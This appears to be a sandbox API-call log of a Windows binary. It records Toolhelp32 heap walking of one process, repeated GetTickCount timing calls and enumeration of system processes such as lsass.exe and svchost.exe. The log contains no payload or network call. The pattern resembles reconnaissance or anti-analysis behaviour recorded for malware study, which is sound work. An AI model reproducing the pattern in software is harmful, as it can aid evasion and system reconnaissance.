	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Module32First") returned 0x765e44b0
	[0096.463] GetProcAddress (hModule=0x765a0000, lpProcName="Module32Next") returned 0x765e4660
	[0096.464] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x408
	[0096.475] GetTickCount () returned 0x2bb09
	[0096.475] Heap32ListFirst (hSnapshot=0x408, lphl=0x20afa60) returned 1
	[0096.476] GetCurrentThreadId () returned 0xc24
	[0096.476] Heap32First (lphe=0x20af65c, th32ProcessID=0xdd4, th32HeapID=0x4f0000) returned 1
	[0096.479] GetCurrentThreadId () returned 0xc24
	[0096.479] Heap32Next (lphe=0x20af65c) returned 1
	[0096.483] GetTickCount () returned 0x2bb18
	[0096.483] GetCurrentThreadId () returned 0xc24
	[0096.483] Heap32Next (lphe=0x20af65c) returned 1
	[0096.486] GetTickCount () returned 0x2bb18
	[0096.486] GetCurrentThreadId () returned 0xc24
	[0096.486] Heap32Next (lphe=0x20af65c) returned 1
	[0096.490] GetTickCount () returned 0x2bb18
	[0096.490] GetCurrentThreadId () returned 0xc24
	[0096.490] Heap32Next (lphe=0x20af65c) returned 1
	[0096.493] GetTickCount () returned 0x2bb18
	[0096.493] GetCurrentThreadId () returned 0xc24
	[0096.494] Heap32Next (lphe=0x20af65c) returned 1
	[0096.497] GetTickCount () returned 0x2bb18
	[0096.497] GetCurrentThreadId () returned 0xc24
	[0096.497] Heap32Next (lphe=0x20af65c) returned 1
	[0096.501] GetTickCount () returned 0x2bb28
	[0096.501] GetCurrentThreadId () returned 0xc24
	[0096.501] Heap32Next (lphe=0x20af65c) returned 1
	[0096.504] GetTickCount () returned 0x2bb28
	[0096.504] GetCurrentThreadId () returned 0xc24
	[0096.504] Heap32Next (lphe=0x20af65c) returned 1
	[0096.538] GetTickCount () returned 0x2bb47
	[0096.538] GetCurrentThreadId () returned 0xc24
	[0096.559] Heap32Next (lphe=0x20af65c) returned 1
	[0096.562] GetTickCount () returned 0x2bb66
	[0096.562] GetCurrentThreadId () returned 0xc24
	[0096.563] Heap32Next (lphe=0x20af65c) returned 1
	[0096.566] GetTickCount () returned 0x2bb66
	[0096.566] GetCurrentThreadId () returned 0xc24
	[0096.566] Heap32Next (lphe=0x20af65c) returned 1
	[0096.569] GetTickCount () returned 0x2bb66
	[0096.570] GetCurrentThreadId () returned 0xc24
	[0096.570] Heap32Next (lphe=0x20af65c) returned 1
	[0096.580] GetTickCount () returned 0x2bb76
	[0096.580] GetCurrentThreadId () returned 0xc24
	[0096.580] Heap32Next (lphe=0x20af65c) returned 1
	[0096.585] GetTickCount () returned 0x2bb76
	[0096.585] GetCurrentThreadId () returned 0xc24
	[0096.585] Heap32Next (lphe=0x20af65c) returned 1
	[0096.589] GetTickCount () returned 0x2bb76
	[0096.589] GetCurrentThreadId () returned 0xc24
	[0096.589] Heap32Next (lphe=0x20af65c) returned 1
	[0096.594] GetTickCount () returned 0x2bb86
	[0096.594] GetCurrentThreadId () returned 0xc24
	[0096.594] Heap32Next (lphe=0x20af65c) returned 1
	[0096.597] GetTickCount () returned 0x2bb86
	[0096.597] GetCurrentThreadId () returned 0xc24
	[0096.597] Heap32Next (lphe=0x20af65c) returned 1
	[0096.629] GetTickCount () returned 0x2bba5
	[0096.629] GetCurrentThreadId () returned 0xc24
	[0096.629] Heap32Next (lphe=0x20af65c) returned 1
	[0096.633] GetTickCount () returned 0x2bba5
	[0096.633] GetCurrentThreadId () returned 0xc24
	[0096.633] Heap32Next (lphe=0x20af65c) returned 1
	[0096.636] GetTickCount () returned 0x2bba5
	[0096.636] GetCurrentThreadId () returned 0xc24
	[0096.636] Heap32Next (lphe=0x20af65c) returned 1
	[0096.640] GetTickCount () returned 0x2bba5
	[0096.640] GetCurrentThreadId () returned 0xc24
	[0096.640] Heap32Next (lphe=0x20af65c) returned 1
	[0096.644] GetTickCount () returned 0x2bbb5
	[0096.644] GetCurrentThreadId () returned 0xc24
	[0096.644] Heap32Next (lphe=0x20af65c) returned 1
	[0096.648] GetTickCount () returned 0x2bbb5
	[0096.648] GetCurrentThreadId () returned 0xc24
	[0096.648] Heap32Next (lphe=0x20af65c) returned 1
	[0096.651] GetTickCount () returned 0x2bbb5
	[0096.651] GetCurrentThreadId () returned 0xc24
	[0096.651] Heap32Next (lphe=0x20af65c) returned 1
	[0096.655] GetTickCount () returned 0x2bbc4
	[0096.655] GetCurrentThreadId () returned 0xc24
	[0096.655] Heap32Next (lphe=0x20af65c) returned 1
	[0096.659] GetTickCount () returned 0x2bbc4
	[0096.659] GetCurrentThreadId () returned 0xc24
	[0096.659] Heap32Next (lphe=0x20af65c) returned 1
	[0096.699] GetTickCount () returned 0x2bbe3
	[0096.699] GetCurrentThreadId () returned 0xc24
	[0096.699] Heap32Next (lphe=0x20af65c) returned 1
	[0096.709] GetTickCount () returned 0x2bbf3
	[0096.709] GetCurrentThreadId () returned 0xc24
	[0096.709] Heap32Next (lphe=0x20af65c) returned 1
	[0096.712] GetTickCount () returned 0x2bbf3
	[0096.712] GetCurrentThreadId () returned 0xc24
	[0096.713] Heap32Next (lphe=0x20af65c) returned 1
	[0096.717] GetTickCount () returned 0x2bc03
	[0096.717] GetCurrentThreadId () returned 0xc24
	[0096.717] Heap32Next (lphe=0x20af65c) returned 1
	[0096.721] GetTickCount () returned 0x2bc03
	[0096.721] GetCurrentThreadId () returned 0xc24
	[0096.722] Heap32Next (lphe=0x20af65c) returned 1
	[0096.726] GetTickCount () returned 0x2bc03
	[0096.726] GetCurrentThreadId () returned 0xc24
	[0096.726] Heap32Next (lphe=0x20af65c) returned 1
	[0096.730] GetTickCount () returned 0x2bc03
	[0096.730] GetCurrentThreadId () returned 0xc24
	[0096.730] Heap32Next (lphe=0x20af65c) returned 1
	[0096.733] GetTickCount () returned 0x2bc12
	[0096.733] GetCurrentThreadId () returned 0xc24
	[0096.733] Heap32Next (lphe=0x20af65c) returned 1
	[0096.737] GetTickCount () returned 0x2bc12
	[0096.737] GetCurrentThreadId () returned 0xc24
	[0096.737] Heap32Next (lphe=0x20af65c) returned 1
	[0096.775] GetTickCount () returned 0x2bc32
	[0096.775] GetCurrentThreadId () returned 0xc24
	[0096.776] Heap32Next (lphe=0x20af65c) returned 1
	[0096.780] GetTickCount () returned 0x2bc41
	[0096.780] GetCurrentThreadId () returned 0xc24
	[0096.780] Heap32Next (lphe=0x20af65c) returned 1
	[0096.784] GetTickCount () returned 0x2bc41
	[0096.784] GetCurrentThreadId () returned 0xc24
	[0096.784] Heap32Next (lphe=0x20af65c) returned 1
	[0096.788] GetTickCount () returned 0x2bc41
	[0096.788] GetCurrentThreadId () returned 0xc24
	[0096.788] Heap32Next (lphe=0x20af65c) returned 1
	[0096.792] GetTickCount () returned 0x2bc41
	[0096.792] GetCurrentThreadId () returned 0xc24
	[0096.792] Heap32Next (lphe=0x20af65c) returned 1
	[0096.796] GetTickCount () returned 0x2bc51
	[0096.796] GetCurrentThreadId () returned 0xc24
	[0096.796] Heap32Next (lphe=0x20af65c) returned 1
	[0096.799] GetTickCount () returned 0x2bc51
	[0096.799] GetCurrentThreadId () returned 0xc24
	[0096.800] Heap32Next (lphe=0x20af65c) returned 1
	[0096.803] GetTickCount () returned 0x2bc51
	[0096.803] GetCurrentThreadId () returned 0xc24
	[0096.803] Heap32Next (lphe=0x20af65c) returned 1
	[0096.832] GetTickCount () returned 0x2bc70
	[0096.832] GetCurrentThreadId () returned 0xc24
	[0096.832] Heap32Next (lphe=0x20af65c) returned 1
	[0096.835] GetTickCount () returned 0x2bc70
	[0096.835] GetCurrentThreadId () returned 0xc24
	[0096.835] Heap32Next (lphe=0x20af65c) returned 1
	[0096.839] GetTickCount () returned 0x2bc70
	[0096.839] GetCurrentThreadId () returned 0xc24
	[0096.839] Heap32Next (lphe=0x20af65c) returned 1
	[0096.843] GetTickCount () returned 0x2bc80
	[0096.843] GetCurrentThreadId () returned 0xc24
	[0096.843] Heap32Next (lphe=0x20af65c) returned 1
	[0096.848] GetTickCount () returned 0x2bc80
	[0096.848] GetCurrentThreadId () returned 0xc24
	[0096.848] Heap32Next (lphe=0x20af65c) returned 1
	[0096.851] GetTickCount () returned 0x2bc80
	[0096.851] GetCurrentThreadId () returned 0xc24
	[0096.852] Heap32Next (lphe=0x20af65c) returned 1
	[0096.855] GetTickCount () returned 0x2bc80
	[0096.855] GetCurrentThreadId () returned 0xc24
	[0096.855] Heap32Next (lphe=0x20af65c) returned 1
	[0096.859] GetTickCount () returned 0x2bc8f
	[0096.859] GetCurrentThreadId () returned 0xc24
	[0096.859] Heap32Next (lphe=0x20af65c) returned 1
	[0096.863] GetTickCount () returned 0x2bc8f
	[0096.863] GetCurrentThreadId () returned 0xc24
	[0096.863] Heap32Next (lphe=0x20af65c) returned 1
	[0096.892] GetTickCount () returned 0x2bcaf
	[0096.892] GetCurrentThreadId () returned 0xc24
	[0096.892] Heap32Next (lphe=0x20af65c) returned 1
	[0096.896] GetTickCount () returned 0x2bcaf
	[0096.896] GetCurrentThreadId () returned 0xc24
	[0096.896] Heap32Next (lphe=0x20af65c) returned 1
	[0096.899] GetTickCount () returned 0x2bcaf
	[0096.899] GetCurrentThreadId () returned 0xc24
	[0096.899] Heap32Next (lphe=0x20af65c) returned 1
	[0096.903] GetTickCount () returned 0x2bcaf
	[0096.903] GetCurrentThreadId () returned 0xc24
	[0096.903] Heap32Next (lphe=0x20af65c) returned 1
	[0096.906] GetTickCount () returned 0x2bcbe
	[0096.906] GetCurrentThreadId () returned 0xc24
	[0096.907] Heap32Next (lphe=0x20af65c) returned 1
	[0096.910] GetTickCount () returned 0x2bcbe
	[0096.910] GetCurrentThreadId () returned 0xc24
	[0096.910] Heap32Next (lphe=0x20af65c) returned 1
	[0096.914] GetTickCount () returned 0x2bcbe
	[0096.914] GetCurrentThreadId () returned 0xc24
	[0096.914] Heap32Next (lphe=0x20af65c) returned 1
	[0096.917] GetTickCount () returned 0x2bcbe
	[0096.917] GetCurrentThreadId () returned 0xc24
	[0096.918] Heap32Next (lphe=0x20af65c) returned 1
	[0096.921] GetTickCount () returned 0x2bcce
	[0096.921] GetCurrentThreadId () returned 0xc24
	[0096.921] Heap32Next (lphe=0x20af65c) returned 1
	[0096.954] GetTickCount () returned 0x2bced
	[0096.954] GetCurrentThreadId () returned 0xc24
	[0096.954] Heap32Next (lphe=0x20af65c) returned 1
	[0096.958] GetTickCount () returned 0x2bced
	[0096.958] GetCurrentThreadId () returned 0xc24
	[0096.958] Heap32Next (lphe=0x20af65c) returned 1
	[0096.961] GetTickCount () returned 0x2bced
	[0096.961] GetCurrentThreadId () returned 0xc24
	[0096.961] Heap32Next (lphe=0x20af65c) returned 1
	[0096.965] GetTickCount () returned 0x2bced
	[0096.965] GetCurrentThreadId () returned 0xc24
	[0096.965] Heap32Next (lphe=0x20af65c) returned 1
	[0096.969] GetTickCount () returned 0x2bcfd
	[0096.969] GetCurrentThreadId () returned 0xc24
	[0096.969] Heap32Next (lphe=0x20af65c) returned 1
	[0096.972] GetTickCount () returned 0x2bcfd
	[0096.972] GetCurrentThreadId () returned 0xc24
	[0096.972] Heap32Next (lphe=0x20af65c) returned 1
	[0096.976] GetTickCount () returned 0x2bcfd
	[0096.976] GetCurrentThreadId () returned 0xc24
	[0096.976] Heap32Next (lphe=0x20af65c) returned 1
	[0096.980] GetTickCount () returned 0x2bcfd
	[0096.980] GetCurrentThreadId () returned 0xc24
	[0096.980] Heap32Next (lphe=0x20af65c) returned 1
	[0096.984] GetTickCount () returned 0x2bd0c
	[0096.984] GetCurrentThreadId () returned 0xc24
	[0096.984] Heap32Next (lphe=0x20af65c) returned 1
	[0097.012] GetTickCount () returned 0x2bd1c
	[0097.012] GetCurrentThreadId () returned 0xc24
	[0097.013] Heap32Next (lphe=0x20af65c) returned 1
	[0097.016] GetTickCount () returned 0x2bd2c
	[0097.016] GetCurrentThreadId () returned 0xc24
	[0097.017] Heap32Next (lphe=0x20af65c) returned 1
	[0097.020] GetTickCount () returned 0x2bd2c
	[0097.020] GetCurrentThreadId () returned 0xc24
	[0097.021] Heap32Next (lphe=0x20af65c) returned 1
	[0097.033] GetTickCount () returned 0x2bd3b
	[0097.033] GetCurrentThreadId () returned 0xc24
	[0097.033] Heap32Next (lphe=0x20af65c) returned 1
	[0097.037] GetTickCount () returned 0x2bd3b
	[0097.037] GetCurrentThreadId () returned 0xc24
	[0097.037] Heap32Next (lphe=0x20af65c) returned 1
	[0097.041] GetTickCount () returned 0x2bd3b
	[0097.041] GetCurrentThreadId () returned 0xc24
	[0097.041] Heap32Next (lphe=0x20af65c) returned 1
	[0097.045] GetTickCount () returned 0x2bd4b
	[0097.045] GetCurrentThreadId () returned 0xc24
	[0097.045] Heap32Next (lphe=0x20af65c) returned 1
	[0097.049] GetTickCount () returned 0x2bd4b
	[0097.049] GetCurrentThreadId () returned 0xc24
	[0097.049] Heap32Next (lphe=0x20af65c) returned 1
	[0097.054] GetTickCount () returned 0x2bd4b
	[0097.054] GetCurrentThreadId () returned 0xc24
	[0097.054] Heap32Next (lphe=0x20af65c) returned 1
	[0097.087] GetTickCount () returned 0x2bd6a
	[0097.087] GetCurrentThreadId () returned 0xc24
	[0097.087] Heap32Next (lphe=0x20af65c) returned 1
	[0097.091] GetTickCount () returned 0x2bd6a
	[0097.091] Heap32ListNext (hSnapshot=0x408, lphl=0x20afa60) returned 1
	[0097.092] GetTickCount () returned 0x2bd6a
	[0097.092] GetCurrentThreadId () returned 0xc24
	[0097.092] Heap32First (lphe=0x20af65c, th32ProcessID=0xdd4, th32HeapID=0x880000) returned 1
	[0097.095] GetCurrentThreadId () returned 0xc24
	[0097.095] Heap32Next (lphe=0x20af65c) returned 1
	[0097.099] GetTickCount () returned 0x2bd7a
	[0097.099] GetCurrentThreadId () returned 0xc24
	[0097.099] Heap32Next (lphe=0x20af65c) returned 1
	[0097.103] GetTickCount () returned 0x2bd7a
	[0097.103] GetCurrentThreadId () returned 0xc24
	[0097.103] Heap32Next (lphe=0x20af65c) returned 1
	[0097.107] GetTickCount () returned 0x2bd7a
	[0097.107] GetCurrentThreadId () returned 0xc24
	[0097.107] Heap32Next (lphe=0x20af65c) returned 1
	[0097.111] GetTickCount () returned 0x2bd89
	[0097.111] GetCurrentThreadId () returned 0xc24
	[0097.111] Heap32Next (lphe=0x20af65c) returned 1
	[0097.115] GetTickCount () returned 0x2bd89
	[0097.115] GetCurrentThreadId () returned 0xc24
	[0097.115] Heap32Next (lphe=0x20af65c) returned 1
	[0097.260] GetTickCount () returned 0x2be16
	[0097.260] GetCurrentThreadId () returned 0xc24
	[0097.260] Heap32Next (lphe=0x20af65c) returned 1
	[0097.264] GetTickCount () returned 0x2be26
	[0097.264] GetCurrentThreadId () returned 0xc24
	[0097.264] Heap32Next (lphe=0x20af65c) returned 1
	[0097.269] GetTickCount () returned 0x2be26
	[0097.269] GetCurrentThreadId () returned 0xc24
	[0097.269] Heap32Next (lphe=0x20af65c) returned 1
	[0097.273] GetTickCount () returned 0x2be26
	[0097.273] GetCurrentThreadId () returned 0xc24
	[0097.273] Heap32Next (lphe=0x20af65c) returned 1
	[0097.277] GetTickCount () returned 0x2be26
	[0097.277] GetCurrentThreadId () returned 0xc24
	[0097.277] Heap32Next (lphe=0x20af65c) returned 1
	[0097.281] GetTickCount () returned 0x2be35
	[0097.281] GetCurrentThreadId () returned 0xc24
	[0097.281] Heap32Next (lphe=0x20af65c) returned 1
	[0097.285] GetTickCount () returned 0x2be35
	[0097.285] GetCurrentThreadId () returned 0xc24
	[0097.292] Heap32Next (lphe=0x20af65c) returned 1
	[0097.296] GetTickCount () returned 0x2be45
	[0097.296] GetCurrentThreadId () returned 0xc24
	[0097.296] Heap32Next (lphe=0x20af65c) returned 1
	[0097.513] GetTickCount () returned 0x2bf10
	[0097.513] Heap32ListNext (hSnapshot=0x408, lphl=0x20afa60) returned 1
	[0097.514] GetTickCount () returned 0x2bf20
	[0097.514] GetTickCount () returned 0x2bf20
	[0097.514] Process32First (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0097.515] GetCurrentThreadId () returned 0xc24
	[0097.515] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0097.516] GetTickCount () returned 0x2bf20
	[0097.516] GetCurrentThreadId () returned 0xc24
	[0097.517] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0097.518] GetTickCount () returned 0x2bf20
	[0097.518] GetCurrentThreadId () returned 0xc24
	[0097.518] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0097.519] GetTickCount () returned 0x2bf20
	[0097.519] GetCurrentThreadId () returned 0xc24
	[0097.519] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0097.520] GetTickCount () returned 0x2bf20
	[0097.520] GetCurrentThreadId () returned 0xc24
	[0097.520] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0097.521] GetTickCount () returned 0x2bf20
	[0097.521] GetCurrentThreadId () returned 0xc24
	[0097.521] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0097.522] GetTickCount () returned 0x2bf20
	[0097.522] GetCurrentThreadId () returned 0xc24
	[0097.522] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0097.523] GetTickCount () returned 0x2bf20
	[0097.523] GetCurrentThreadId () returned 0xc24
	[0097.523] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0097.525] GetTickCount () returned 0x2bf20
	[0097.525] GetCurrentThreadId () returned 0xc24
	[0097.525] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.526] GetTickCount () returned 0x2bf20
	[0097.526] GetCurrentThreadId () returned 0xc24
	[0097.526] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.527] GetTickCount () returned 0x2bf20
	[0097.527] GetCurrentThreadId () returned 0xc24
	[0097.527] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0097.528] GetTickCount () returned 0x2bf20
	[0097.528] GetCurrentThreadId () returned 0xc24
	[0097.528] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.529] GetTickCount () returned 0x2bf2f
	[0097.529] GetCurrentThreadId () returned 0xc24
	[0097.529] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.530] GetTickCount () returned 0x2bf2f
	[0097.530] GetCurrentThreadId () returned 0xc24
	[0097.530] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.531] GetTickCount () returned 0x2bf2f
	[0097.531] GetCurrentThreadId () returned 0xc24
	[0097.532] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.533] GetTickCount () returned 0x2bf2f
	[0097.533] GetCurrentThreadId () returned 0xc24
	[0097.533] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5e, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.534] GetTickCount () returned 0x2bf2f
	[0097.534] GetCurrentThreadId () returned 0xc24
	[0097.534] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.535] GetTickCount () returned 0x2bf2f
	[0097.535] GetCurrentThreadId () returned 0xc24
	[0097.535] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.536] GetTickCount () returned 0x2bf2f
	[0097.536] GetCurrentThreadId () returned 0xc24
	[0097.536] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0097.537] GetTickCount () returned 0x2bf2f
	[0097.538] GetCurrentThreadId () returned 0xc24
	[0097.538] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1
	[0097.539] GetTickCount () returned 0x2bf2f
	[0097.539] GetCurrentThreadId () returned 0xc24
	[0097.539] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.540] GetTickCount () returned 0x2bf2f
	[0097.540] GetCurrentThreadId () returned 0xc24
	[0097.540] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x650, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1
	[0097.541] GetTickCount () returned 0x2bf2f
	[0097.541] GetCurrentThreadId () returned 0xc24
	[0097.541] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1
	[0097.542] GetTickCount () returned 0x2bf2f
	[0097.542] GetCurrentThreadId () returned 0xc24
	[0097.542] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1f0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0097.596] GetTickCount () returned 0x2bf6e
	[0097.597] GetCurrentThreadId () returned 0xc24
	[0097.599] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1
	[0097.605] GetTickCount () returned 0x2bf6e
	[0097.606] GetCurrentThreadId () returned 0xc24
	[0097.606] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x39, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0097.611] GetTickCount () returned 0x2bf7d
	[0097.616] GetCurrentThreadId () returned 0xc24
	[0097.616] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1
	[0097.619] GetTickCount () returned 0x2bf7d
	[0097.624] GetCurrentThreadId () returned 0xc24
	[0097.624] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1
	[0097.645] GetTickCount () returned 0x2bf9d
	[0097.645] GetCurrentThreadId () returned 0xc24
	[0097.645] Process32Next (in: hSnapshot=0x408, lppe=0x20af8f8 | out: lppe=0x20af8f8*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1
	[0097.646] GetTickCount () returned 0x2bf9d
	[0097.646] GetCurrentThreadId () returned 0xc24
